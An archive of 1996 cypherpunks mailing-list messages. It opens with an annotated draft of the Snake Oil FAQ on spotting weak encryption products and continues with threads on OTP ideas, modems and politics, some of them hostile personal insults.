
>>> But if many of the items on the "Things to look out for" list seem to
apply to a product, the product is very likely weak.
-----------------------------



-----------------------------
>From time to time, a reputable and decent vendor
will produce something that is actually quite good, but will use some
[braindead] marketing technique, so be aware of exceptions.

>>> "Braindead", eh, hmmmmm.  Too dignified  ;)
-----------------------------



Every effort has been made to produce an accurate and useful document, but
the information contained herein is completely without warranty. If you 
find any errors,
or wish to otherwise contribute, please contact the document keeper,
C Matthew Curtin <cmcurtin@research.megasoft.com>


Introduction

Good cryptography is an excellent and necessary tool for almost anyone.
However, there is a multitude of products around. Many good cryptographic
products are available, both commercial (including shareware) and free.
However, there are also some extremely bad cryptographic products (known in
the field as "Snake Oil"), which not only fail do their job of providing
security, but are based on, and add to, the many misconceptions and
misunderstandings surrounding cryptography and security.

-----------------------------
>>> They also prey on the inexperience of the consumer, rely on the mystery 
and mystique of mathmatical-sounding jargon, to make poorly engineered 
products
seem to be something they are not.
-----------------------------



Superficially, it is difficult for someone to distinguish the output of a
secure encryption utility from snake oil: both look garbled. The purpose of
this document is >>> to <<< present some obvious "red flags" [so that] >>> 
which <<< people
unfamiliar with the nuts and bolts of cryptography can use as a guideline 
for
determining whether they're dealing with snake oil or the Real Thing.

For a variety of reasons, this document is general in scope and does not
mention specific products or algorithms as being "good" or "Snake Oil".

When evaluating any product, be sure to understand what your needs are. For
data security products, what do you need protected? Do you want an archiver
that [supports strong encryption? ]

-----------------------------
>>> Problem: what is "Strong Encryption" ???  From a user's point of view
this term is too fuzzy. Try: "that will keep data secure from your kid 
sister?
A rogue government?  For 5 minutes?  Etc. etc. "
-----------------------------



-----------------------------
[An E-mail client? Something that will
encrypt on-line communications? Do you want to encrypt an entire disk or
partition, or selectively some files? Do you need on-the-fly (automatic)
encryption and decryption, or are you willing to select when and which 
files you want encrypted? ]

>>> I'd leave that out: not pertinent to snake-oil vs. Good Stuff,
but is about the kind of application user requires.

How secure is "secure enough?" Does the data need to be unreadable by third 
parties for 5 minutes? One year? 50 years? 100 years? >>> see above.
-----------------------------


-----------------------------
[Different products will serve different needs, and it's rare that a 
product
will serve every need. (Sometimes a product won't be needed: it may be
better to use a utility to encrypt files, transmit them over a network 
using standard file transfer tools, and decrypt them at the other end than 
to use a separate encrypted utility in some cases.)]

>>> I don't understand: "sometimes a product won't be needed?"
I think this paragraph could be left out.  After all, OS utility or
Snoop-Dooper-Doggy-Doo-Ware product, ya still gotta know what you're doing, 
right?
So you everthing in the FAQ still applies; or maybe I'm missing the point 
here.
-----------------------------


Some basics

The cryptography-faq (found at
ftp://rtfm.mit.edu/pub/usenet/cryptography-faq/) is a more general tutorial
of cryptography, and should also be consulted. In an effort to make this 
FAQ
more complete, some very basic topics are included below.

Conventional vs. Public Key Cryptography

-----------------------------
There are two basic types of cryptosystems: symmetric (also known as
"conventional," [sometimes also called] >>> or <<< "private key") and 
asymmetric (public key).
Symmetric ciphers require both the sender and the recipient to have the 
same key. That key is [applied]
>>> used by the cryptographic algorithm  <<<
to encrypt the data >>> originated <<< by the sender, and again by the 
recipient to decrypt the data. Asymmetric ciphers are much more
flexible, from a key management perspective. Each user has a pair of keys: 
a public key and a private key. The public key is shared widely, given to
everyone, while the private key is kept secret. If Alice wishes to mail Bob
some secrets, she simply gets Bob's public key, encrypts her message with
it, and sends it off to Bob. When Bob gets the message, he uses is private
key to decrypt the message.

Asymmetric [cryptosystems] >>>algorithms<<< are much slower than [their 
symmetric counterparts.]
>>> symmetric algorithms, and are almost exclusively used to encrypt short 
"session keys," which
are then used to encrypt a message using the speedier symmetric algorithms. 
This use of public key cryptography is called "key exchange."
-----------------------------

-----------------------------
[Also, key sizes must be much larger.]
>>>I agree with one comment that discouraged comparing the 2 algo types.
-----------------------------


See the cryptography FAQ for a more
detailed discussion of [the topic.] >>>these topics.<<<


Key Sizes

-----------------------------
Some ciphers, while currently secure against most attacks, are not
considered viable in the next few years because of relatively small 
keysizes
and increasing processor speeds [(making a brute-force attacks feasible).]

>>> Again, I maintain that the audience for this stuff can't be relied upon 
to
even know what that means.  Try: "which makes the cipher vulnerable to 
breaking
by trying every possible key combination (called a brute-force attack)."
 --- or something like that.
-----------------------------



The tables below should give some general guidelines for making intelligent
decisions about the key length you need. If the key is too short,
the system will be easily broken, even if the cipher is a good one.

In [1] and [2], we're presented with some guidelines for deciding
appropriate key length. (It is important to note that this is based on the
ability to predict computing power 40, 65, and 100 years from now. Major
breakthroughs in computing power 30 years from now might render everything
on this chart kiddieplay.)

               Security Requirements for Different Information

              Type of Traffic                Lifetime   Minimum [Symmetric]
                                                             Key Length
 Tactical military information             minutes/hours     56-64 bits
 Product announcements, mergers, interest
 rates                                      days/weeks        64 bits
 Long-term business plans                      years          64 bits
 Trade secrets (e.g., recipe for
 Coca-Cola)                                   decades         112 bits
 H-bomb secrets                              >40 years        128 bits
 Identities of spies                         >50 years        128 bits
 Personal affairs                            >50 years        128 bits
 Diplomatic embarrassments                   >65 years   at least 128 bits
 U.S. Census data                            100 years   at least 128 bits

-----------------------------
>>> Where is the attribution for the table?
-----------------------------

As mentioned earlier, asymmetric ciphers require significantly longer keys
to provide the same level of security as their symmetric cipher
counterparts. Here is a comparison table, again, from Applied Cryptography,
second edition.
                    Symmetric and Public-Key Lengths With
                  Similar Resistance to Brute-Force Attacks

                 Symmetric Key Length Public-key Key Length
                        56 bits             384 bits
                        64 bits             512 bits
                        80 bits             768 bits
                       112 bits             1792 bits
                       128 bits             2304 bits

-----------------------------
>>> BEWARE, Danger: comparing public/private key cryptosystems again.
I think if you really want to do so, then the comparison should really be 
explained.
-----------------------------



Some Common Snake-Oil Warning Signs

The following are some of the "red flags" one should watch for when
examining an encryption product

   * Technobabble

     The vendor's description of the product may contain a lot of
     hard-to-follow use of technical terms to describe how the product
     works. If this appears to be confusing nonsense, it may very well be
     (even to someone familiar with the terminology). Technobabble is a 
good
     means of confusing a potential user and masking the fact that the
     vendor doesn't understand anything either.

     A sign of technobabble is a descrption which drops a lot of technical
     terms for how the system works without actually explaining how it
     works. Often specifically coined terms are used to describe the scheme
     which are not found in the literature.

   * New Type of Cryptography?

     Beware of any vendor who claims to have invented a "new type of
     cryptography" or a "revolutionary breakthrough". Truly "new
     break-throughs" are likely to show up in the >>> scientific <<< 
literature,
     and [many in the field] >>> professionals won't <<< [are unlikely to] 
trust
     them until after years of analysis, by
     which time they are not so new anymore.

     Avoid software which claims to use 'new paradigms' of computing such 
as
     cellular automata, neural nets, genetic algorithms, chaos theory, etc.
     Just because software uses to different method of computation doesn't
     make it more secure.

-----------------------------
     >>> As a matter of fact, these techniques are the subject of ongoing
     cryptographic research and nobody has published successful results
     based on their use yet.
-----------------------------

     Anything that claims to have invented a new [public key] cryptosystem
     without publishing the details or underlying mathematical principles 
is
     highly suspect. Modern cryptography, especially public key systems, is
     grounded in mathematical theory. The security is based on problems 
that are believed,
     if not known to be hard to solve.

-----------------------------
>>> There are some other comments in cpunks on this last bit.  I defer.
-----------------------------

     The strength of any encryption scheme is only proven by the test of
     time, >>> involving exhaustive analysis by cryptographers<<<. New 
crypto is like new pharmaceuticals, not new cars.

   * Proprietary Algorithms

     Avoid software which uses "proprietary" or "secret" algorithms.
     Security through obscurity is not considered a safe means of 
protecting your data.
     If the vendor does not feel confident that the method used
     can withstand years of scrutiny by the [academic] >>> professional and 
academic cryptographic <<< community, then you
     should be wary of trusting it. (Note that a vendor who specializes in
     the cryptography may have a proprietary algorithm which they'll show 
to
     others if they sign a non-disclosure agreement. If the vendor is
     well-reputed in the field, this can be an exception.)

-----------------------------
>>> How can you tell a well-reputed vendor?  I am thinging of one co.
that promises to release their algo. details upon NDA,
but at least in my case the details never showed up!
This is slippery here!
-----------------------------

     Beware of specially modified versions of well-known algorithms. This
     may intentionally or unintentionally weaken the cipher.

     The use of a trusted algorithm, >>> availability of <<< [if not with] 
technical notes explaining
     the implementation ([if not availability of] >>> and preferably <<< 
the source code for the
     product) are a sign of good faith on the part of the vendor that you
     can take apart and test the implementation yourself.

     A common excuse for not disclosing how a program works is that 
"hackers
     might try to crack the program's security." While this may be a valid
     concern, it should be noted that such 'hackers' can reverse engineer
     the program to see how it works anyway. If the program is implemented
     properly and the algorithm is secure, this is not a problem. (If a
     hypothetical 'hacker' was able to get access you your system, access 
to
     encrypted data might be the least of your problems.)

-----------------------------
>>> Add: The strength of a cryptosystem should depend ONLY on the security 
of the keys involved,
and not the security of the algorithm.
-----------------------------

   * Experienced Security Experts and Rave Reviews

     Beware of any product claiming that "experienced security experts" 
have
     analyzed it, but it won't say who (especially if the scheme has not
     been published in a reputable journal).

     Don't rely on reviews in newspapers, magazines or television shows,
     since they generally don't have cryptologists (celebrity hackers who
     know about telephone systems don't count) take the software apart for
     them.

     Just because the vendor is a well known company or the algorithm is
     patented doesn't make it secure either.

   * Unbreakability

     Some vendors will claim their software is "unbreakable". This is
     marketing hype, and a common sign of snake-oil. Avoid any vendor that
     makes unrealistic claims.
-----------------------------
>>> The reader is not qualified to evaluate realistic/unrealistic.
-----------------------------

     No algorithm is unbreakable. Even the best algorithms are breakable
     using "brute force" (trying every possible key), but if the key size 
is
     large enough, this is impractical even with vast amounts of computing
     power.

     One-time pads are unbreakable, but they must be implemented perfectly,
     which is, at best, very difficult. See the next section for a more
     detailed discussion.

-----------------------------
>>> Add: Avoid products that use huge numbers to impress you that it would
take massive amounts of time to break them.  This is ONLY true under the
assumption that the only way to break the system is by exhaustively trying
every possible key, and this assumption hass to be proved before the claim 
is valid.
A cryptosystem using a keylength of 50,000 bits theoretically would take
2 raised to the 50,000th power to break (a ridiculously large number) if,
AND ONLY IF the algorithm had no weaknesses.  The hard part of cryptosystem 
design is making an algorithm with no weaknesses, such that exhaustive 
brute-force
search is the only method of breaking it, not using long keys.
-----------------------------

   * One-Time-Pads

     A vendor might claim the system uses a one-time-pad (OTP), which is
     theoretically unbreakable. That is, snake-oil sellers will try to
     capitalize on the known strength of a OTP. It is important to
     understand that any variation in the implementation means that it is
     not an OTP, and has nowhere near the security of an OTP.

     A OTP system is not an algorithm. It works by having a "pad" of random
     bits in the possession of both the sender and recipient.

-----------------------------
>>> Explain what you mean by a "pad" --- using a term which to the newbie 
may not
usually be associated with crypto.  Origin being the pads of paper that 
they used to use etc.etc. ???
-----------------------------



-----------------------------
     The message is
     encrypted using [the next n bits in the pad as they key, where n is 
the
     number of bits in the message]

>>> as many bits from the key as there are bits in the message.
That is, for each bit in the message, there is a random bit from the 
one-time-pad.<<<
-----------------------------



After the bits are used from the pad,
     they're destroyed, and can never again be used. The bits in the pad
     must be truly random, generated using a real random source, such as
     specialized hardware, radioactive decay timings, etc., and not from an
     algorithm or cipher. Anything else is not a one-time-pad.

     The vendor may confuse random session keys or initialization vectors
     with OTPs.

   * Algorithm or product XXX is insecure

     Be wary of anything that makes claims that particular algorithms or
     other products are insecure without backing up those claims (or at
     least citing references to them).

     Sometimes attacks are theoretical or impractical (requiring special
     circumstances or massive computing power running for many years), and
     it's easy to confuse a layman by mentioning these.

   * Keys and Passwords

     The "key" and the "password" are often not the same thing. The "key"
     generally refers to the actual data used by the cipher, while the
     "password" refers to the word or phrase the user types in, which the
     software converts into the key (usually through a process called
     "hashing" or "key initialization").
>>> Other comments addressed this paragraph.  I defer.

     The reason this is done is because the characters a user is likely to
     type in do not cover the full range of possible characters. (Such keys
     would be more redundant and easier for an attacker to guess.) By
     hashing a key can be made from an arbitrary password that covers the
     full range of possible keys. It also allows one to use longer words, 
or
     phrases and whole sentences as a "passphrase", which is more secure.

     Anything that restricts users' passwords to something like 10 or 16 or
     even 32 characters is foolish. If the actual "password" is the 
cipher's
     key (rather than hashing it into a key, as explained above), avoid it.

     If the vendor confuses the distinctions between bits, bytes and
     characters when discussing the key, avoid this product.

     Convenience is nice, but be wary of anything that sounds too easy to
     use.
-----------------------------
>>> Instead, try: be wary of any product that overly emphasizes
ease-of-use without due attention to its cryptographic strength.
-----------------------------


Avoid anything that lets anyone with your copy of the software to
     access files, data, etc. without having to use some sort of key or
     passphrase.

     Avoid anything that doesn't let you generate your own keys (ie, the
     vendor sends you a key in the mail, or it's embedded in the copy of 
the
     software you buy).

     Avoid anything by a vendor who does not seem to understand the
     difference between public-key (asymmetric) cryptography and 
private-key
     (symmetric) cryptography.

   * Lost keys and passwords

     If there's a third-party utility that can crack the software, avoid 
it.
>>> Which - the utility or the crypto?

     If the vendor claims it can recover lost passwords (without using a
     key-backup or escrow feature), avoid it.

     If there is a key-backup or escrow feature, are you in control of the
     backup, or does the vendor or someone else hold a copy of the key?

   * Exportable from the USA

     If the software is made in North America, can it be exported? If the
     answer is yes, chances are it's not very strong. Strong cryptography 
is
     considered munitions in terms of export from the United States, and
     requires approval from the State Department. Chances are if the
     software is exportable, the algorithm is weak or it is crackable 
(hence
     it was approved for export).

     If the vendor is unaware of export restrictions, avoid the software:
     the vendor is not familiar with the state of the art.

     Because of export restrictions, some legitimate (not-Snake Oil)
     products may have a freely exportable version for outside of the USA,
     which is different from a separate US/Canada-only distribution. Also
     note that just because software has made it outside of North America
     does not mean that it is exportable: sometimes a utility will be
     illegally exported and posted on an overseas site.

Other Considerations

Interface isn't everything: user-friendliness is an important factor, but 
if
the product isn't secure then you're better off with something that is
secure (if not as easy to use).

No product is secure if it's not used properly. You can be the weakest link
in the chain if you use a product carelessly. Do not trust any product to 
be
foolproof, and be wary any product that claims it is.

Contributors

The following folks have contributed to this FAQ.

Jeremey Barrett <jeremey@forequest.com>
<geeman@best.com>
Jim Ray <liberty@gate.net>
Robert Rothenburg Walking-Owl <wlkngowl@unix.asb.com>

References

  1. B. Schneier, Applied Cryptography, second edition, John Wiley & Sons,
     1996
  2. M. Blaze, W. Diffie, R. L. Rivest, B. Schneier, T. Shimomura, E.
     Thompson, M. Wiener, "Minimal Key Lengths for Symmetric Ciphers to
     Provide Adequate Commercial Security," available via
     ftp://ftp.research.att.com/dist/mab/keylength.ps

------------------------------------------------------------------------  
----
C Matthew Curtin
Last modified: Mon Sep 16 09:51:41 EDT
----------------------------------------------------------------------

--
C Matthew Curtin                MEGASOFT, INC                Chief 
Scientist
I speak only for myself.  Don't whine to anyone but me about anything I 
say.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet 
Intranet
cmcurtin@research.megasoft.com 
http://research.megasoft.com/people/cmcurtin/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Wall Street Journal Interactive Edition             <wsj-announce@interactive.wsj.com>
Date: Thu, 19 Sep 1996 09:17:29 +0800
To: Multiple recipients of list WSJ-ANNOUNCE3             <WSJ-ANNOUNCE3@LISTSERV.DOWJONES.COM>
Subject: Interactive Edition free access ends this week
Message-ID: <2.2.32.19960917180356.0072c02c@pop.dowjones.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Subscriber:
This Friday is the last day of your free trial subscription to The Wall
Street Journal Interactive Edition.

We hope you've enjoyed this extensive free period and that you will--if you
haven't already--join us as a charter annual subscriber.

You don't need to re-register. Just fill out a brief online form and provide
us with payment information. An annual subscription costs just $49 a year or
$29 a year if you subscribe to any print edition of The Wall Street Journal.

To convert to an annual subscription, just access http://wsj.com and click
on the "Convert Now" graphic. If you do not wish to convert to an annual
subscription, you do not need to do anything -- you will not be billed and
your subscription will be canceled automatically at the end of the trial.

You may also be interested in a special offer available to users of
Microsoft's Internet Explorer. Microsoft has made arrangements with several
premier publishers on the Web, including the Interactive Edition, to offer
subscriptions to Internet Explorer users at no charge through the end of
this year. If you use Internet
Explorer as your Web browser, you will be able to keep reading the
Interactive Edition through Dec.  31, 1996, and there is no need for you to
provide us with payment information at this time. For more information on
this offer, you can visit http://wsj.com/ie.html or ask us questions at the
e-mail address below.

If you have questions or comments, e-mail us at the address below or call
Customer Service at 1-800-369-2834 or 1-609-514-0870.

Neil Budde
Editor
The Wall Street Journal Interactive Edition
info@interactive.wsj.com

        --------------------------------------------------------
The WSJ-ANNOUNCE3 list is a service of The Wall Street Journal Interactive Edition
(http://wsj.com).

If you no longer wish to receive messages from the WSJ-ANNOUNCE3 list, simply
reply to
this message and in the body of your message type:

UNSUBSCRIBE WSJ-ANNOUNCE3





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Thu, 19 Sep 1996 13:50:24 +0800
To: cypherpunks@toad.com
Subject: OTP seed solution? - strong, tried before???
Message-ID: <842976406.25087.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



A very simple idea came to me today that I`m sure has been done 
before and I wanted to find out if it has any problems I haven`t 
seen:

A strong random generator (ie. a BBS) is seeded with a true random 
seed (derived possibly from keyboard latency) and used each time a 
message is send to create a message length randon string.

This string is XOR`d or added to the message creating a OTP.

The recipient has previously been sent a seed value for the generator 
encrypted under say RSA and signed to prevent a man in the middle 
attack.

Each set of recipient<->sender pairs has a seed unique to them.

This seems good to me but the key distribution mess (ie. hundreds of 
keys about) is the big problem, has anyone done any research into 
possible solutions to this???


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Thu, 19 Sep 1996 11:37:57 +0800
To: cypherpunks@toad.com
Subject: Re: IBM_gak
Message-ID: <842988791.23099.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


 
> Apparently, senile Tim May (fart) is a Clinton administration troll planted
> here to sabotage any discussions of actual crypto work and to flood this
> mailing list with lies and personal attacks and to make it unusable.

You would appear to be an accomplice....

 
 

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 19 Sep 1996 09:17:55 +0800
To: "Duncan Frissell" <snow@smoke.suba.com>
Subject: Re: Informal Renegotiation of the Law
Message-ID: <19960918160153703.AAC88@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Sep 1996 17:54:49 -0500 (CDT), snow wrote:

>> For example, you will not read anywhere that compulsory education laws have
>> been repealed -- but they have.  When the home schooling movement started in
>> the late 1970s, there were occasional harassment and prosecution of parents.
>> The home schoolers won some and lost some.  As time went on, the authorities
>> came to accept home schoolers so that at this point, legal problems are
>> rare.  Compulsory education has been effectively repealed by the actions of
>> refusenicks in both the subject population and the enforcement population.  

>     Their children are still getting educated. Not thoroughly enough in 
>some cases, but educated in the basics. 

It has always seemed somewhat amusing that we will have a) a widespread opinion
that homeschooling is of lesser value and b) numerous studies, surveys,
testimonials, reports, etc, that show what a rotten job public education is
doing*.   This raises the question of how anyone even remotely concerned with
their children's welfare could do worse. . .    Yet another unexplained mass
insanity.

* - I can add to the testimonial side of things here. I'm one of those rare
teenagers who went straight to the professional workplace (bypassing college),
but it's in spite of the best effort of our educational system, especially the
so-called GATE programs (Gifted & Talented Education - more like stultification
from my experience in 3 widely separate districts) or honors classes.  They're
real big on the "touchy-feely" but actual academic performance lags.  My
physics teacher was actually expected to teach AP level physics to a bunch of
students who hadn't even had Algebra 2. (I never took Calculus, but that didn't
prevent me from understanding a derivative or integral)  I won't even rant
about the English classes where a 400 page book (about 1.5 hours for me) is a
semester's reading...

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 19 Sep 1996 08:33:36 +0800
To: "attila" <tcmay@got.net>
Subject: Re: Workers Paradise. /Political rant.
Message-ID: <19960918160153703.AAD88@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Sep 96 23:43:33 +0000, attila wrote:

>            forget the idea that it will build a community --unless 
>            you wish to consider the Bitch's "It Takes a Global 
>            Village" a community.  Statist from the cradle; welcome

  She's right about that, to some extent.  It often does take a village to
raise a child.  What she doesn't mention is that the governmental policies she
lobbies for are doing their best to destroy that village.  Name one example
where wealth-transfers have made people more willing to spread their now vastly
reduced resources to the needy?

As a sidenote, does anyone know how much of the money taken out in taxes
actually goes toward useful things? i.e. maintaining infrastructure like roads,
providing for the public defense, paying police (most of whom I've found are
great people. It's the higherups who seem to have ODed something), forest
service, etc?


# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 19 Sep 1996 08:36:37 +0800
To: "Asgaard" <dthorn@gte.net>
Subject: Re: Workers Paradise. /Political rant.
Message-ID: <19960918160153703.AAE88@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Sep 1996 17:13:53 -0700, Dale Thorn wrote:

>> And that's good. The world population really should go back to around
>> 1 billion for achieving a stabile ecology (with singing birds for
>> the peace of minds). The former (?) US system of encouraging young
>> standalone women to make babies to get benefits was very bad. The
>> Chinese system - less benefits the more children you have - is the
>> way to go.

>Just a comment: "The world population really should go back to around 
>one billion", etc. And how could we achieve that without severe govt. 
>oppression, one wonders? Now, I've heard of "education" being used to 
>help the masses learn to be responsible citizens ad nauseam, but since 
>education is pretty much just propaganda in the massively-capitalist 
>system now taking over even the P.R. of China, how the heck is education 
>going to work?

Well, they're much better at telling kids how to use condoms than they are at,
say, explaining an integral. (or even an equation for that matter)


As a side note, how about some real welfare reform:  mandatory birth control
(and pay for that; it's *much* cheaper) and benefits go DOWN for additional
births.

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 19 Sep 1996 08:20:14 +0800
To: "Anonymous" <cypherpunks@toad.com>
Subject: Re: Workers Paradise. /Political rant.
Message-ID: <19960918160153703.AAF88@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Sep 1996 07:37:17 +0200 (MET DST), Anonymous wrote:

>> The thing about _traditional_ charity, of the religious or community sort,
>> was that it was not treated as an "entitlement," as something the resentful
>> masses could "demand" as part of their "human rights."

>   There's no substantial difference between their resentful whining about
>their rights and your resentful whining about your rights - except maybe
>that you whine more.

Last time I checked, tcmay has never insisted that it is his right to have
something I worked for. . .

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 19 Sep 1996 08:14:48 +0800
To: "shamrock@netcom.com>
Subject: Re: 56 kbps modems
Message-ID: <19960918160153703.AAG88@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Sep 1996 23:35:38 -0700 (PDT), Lucky Green wrote:

>Seriously, how may of the 28.8 modem users get connections at 28.8? 
>Twenty percent? Fifty percent? Today's modems are already faster than 
>most analog lines can support. More likely than not, a 56k modem won't 
>link up at 56k. If you want speed, use the clean solution. Get ISDN.

>[And don't buy the Motorola BitSurfer PRO. It won't work with two line
>phones. The sound is so bad, you can't use the POTS you pull out for
>business.  Motorola: "We are aware of the problem". Well, they have been
>aware of it since at least February.]

Interesting. . .  Oh well, I bet their competition doesn't mind.

>But for data, home ISDN is the way to go.

Of course, we'll be getting the cable modems around here by early next year, so
I might just wait for that 15MB/s. . .

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 19 Sep 1996 07:55:00 +0800
To: "gary@systemics.com>
Subject: Re: 56 kbps modems
Message-ID: <19960918160153703.AAH88@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Sep 1996 12:16:08 +0200, Gary Howland wrote:

>craigw@dg.ce.com.au wrote:
>> well here in Australia Telstra our national carrier only "garantees"
>> 2400 baud to work.
>As I am sure has been discussed at length before, baud does not equal
>bps.  AFAIK, V32bis is only 2400baud.
This is correct.  The difference is in the number of values for each of the
2400 signals sent per second.

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Thu, 19 Sep 1996 00:35:05 +0800
To: cypherpunks@toad.com
Subject: The daily warning about Timmy May, the lying sack of shit
Message-ID: <199609181221.FAA30299@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May proves that the Midwestern gene pool needs some chlorine in it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
